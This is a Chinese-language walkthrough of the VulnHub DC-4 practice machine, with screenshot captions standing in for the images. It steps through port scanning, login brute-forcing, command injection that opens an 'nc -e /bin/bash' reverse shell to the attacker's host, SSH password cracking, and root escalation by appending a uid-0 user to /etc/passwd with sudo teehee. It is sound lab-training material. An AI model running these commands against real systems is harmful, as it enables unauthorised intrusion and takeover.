vulnhub-DC4

kaliip :192.168.44.131

主机发现

nmap -sP 192.168.44.0/24

vulnhub-DC4_第1张图片

DC4ip: 192.168.44.144

端口扫描

nmap -A -p1-65535 -T4 192.168.44.144

vulnhub-DC4_第2张图片

开放80、22端口,对应http,ssh服务

访问http服务

vulnhub-DC4_第3张图片

指纹识别

whatweb http://192.168.44.144

vulnhub-DC4_第4张图片

 得知,web服务器为nginx 1.15.10

爆破吧,猜测用户名为admin,使用kali的/usr/share/john下的password.lst字典

vulnhub-DC4_第5张图片

 vulnhub-DC4_第6张图片

 vulnhub-DC4_第7张图片

 vulnhub-DC4_第8张图片

 尝试登录

vulnhub-DC4_第9张图片

 成功

(第二种方法,查看源代码

vulnhub-DC4_第10张图片

 发现以post方式提交到login.php页面,直接访问login.php页面)

点击command,

vulnhub-DC4_第11张图片

出现

vulnhub-DC4_第12张图片

 点击RUN,开启抓包,发送到重发器

vulnhub-DC4_第13张图片

 查看请求包,响应包,发现radio处的值嵌入到

vulnhub-DC4_第14张图片

尝试修改命令,

vulnhub-DC4_第15张图片

 vulnhub-DC4_第16张图片

 开启kali监听,nc -lvnp 4444 

监听使用kali的IP  nc 192.168.44.131 -e /bin/bash

vulnhub-DC4_第17张图片

 vulnhub-DC4_第18张图片

 成功,反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

 vulnhub-DC4_第19张图片

 看到三个文件夹,应该是三个用户

vulnhub-DC4_第20张图片

vulnhub-DC4_第21张图片

 

 只有jim可以进入,并且看到old-passwords.bak文件,既然是密码字典,

就尝试爆破jim用户的密码

vulnhub-DC4_第22张图片

得到jim的密码 jibril04

ssh [email protected]

vulnhub-DC4_第23张图片

 连接成功,并提示有一封邮件,查看

vulnhub-DC4_第24张图片

 给出charles用户以及密码,切换用户

charles   ^xHhA&hvim0y

vulnhub-DC4_第25张图片

 成功登录,尝试提权

查看用户权限

sudo -l

vulnhub-DC4_第26张图片

提示teehee具有root权限

使用teeheem命令创建一个用户uid=0的

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash

vulnhub-DC4_第27张图片

你可能感兴趣的:(安全)